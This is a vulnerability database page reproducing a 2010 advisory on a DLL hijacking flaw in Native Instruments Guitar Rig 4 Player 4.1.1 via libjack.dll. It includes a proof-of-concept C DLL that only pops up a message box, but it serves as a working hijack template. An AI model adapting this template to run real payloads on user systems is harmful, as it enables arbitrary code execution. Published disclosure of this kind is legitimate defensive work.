Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Native Instruments Guitar Rig 4 Player v4.1.1 Insecure Library Loading Vulnerability

🗓️ 20 Nov 2010 00:00:00Reported by Gjoko KrsticType 
zeroscience
 zeroscience🔗 www.zeroscience.mk👁 44 Views

Native Instruments Guitar Rig 4 Player v4.1.1 Insecure Library Loading Vulnerability. Vulnerability allows DLL hijacking, leading to system compromise

Code
<html><body><p>/*

 Native Instruments Guitar Rig 4 Player v4.1.1 Insecure Library Loading Vulnerability


 Vendor: Native Instruments GmbH
 Product web page: http://www.native-instruments.com
 Affected version: 4.1.1.1845 (Standalone)

 Summary: GUITAR RIG 4 PLAYER is the free, modular and expandable effects processor
 from Native Instruments, combining creative effects routing possibilities with
 ease-of-use and pristine sound quality. The included FACTORY SELECTION library
 provides one stunning Amp emulation with Matched Cabinet, plus 20 effects and sound
 modifiers to shape and enhance any audio signal.

 Desc: Guitar Rig 4 Player suffers from a DLL hijacking vulnerability, which could be
 exploited by remote attackers to compromise a vulnerable system. This issue is
 caused due to the application insecurely loading certain libraries ("libjack.dll")
 from the current working directory, which could allow attackers to execute arbitrary
 code by tricking a user into opening specific related files (.nkm and .nkp) from a
 network share.

 Tested on: Microsoft Windows XP Professional SP3 (English)

 Vulnerability discovered by: Gjoko 'LiquidWorm' Krstic
 liquidworm gmail com

 Zero Science Lab - http://www.zeroscience.mk

 Advisory ID: ZSL-2010-4973
 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2010-4973.php

 06.11.2010

*/


#include <windows.h>

BOOL WINAPI DllMain (HANDLE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
{

	switch (fdwReason)
	{
		case DLL_PROCESS_ATTACH:
		dll_mll();
		case DLL_THREAD_ATTACH:
		case DLL_THREAD_DETACH:
		case DLL_PROCESS_DETACH:
		break;
	}

	return TRUE;
}

int dll_mll()
{
	MessageBox(0, "DLL Hijacked!", "DLL Message", MB_OK);
}
</windows.h></p></body></html>

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
20 Nov 2010 00:00Current
6.2Medium risk
Vulners AI Score6.2
native instruments guitar rig 4insecure library loadingsystem accessvulnerabilitydll hijackingremote attackersexploitzero science lab
44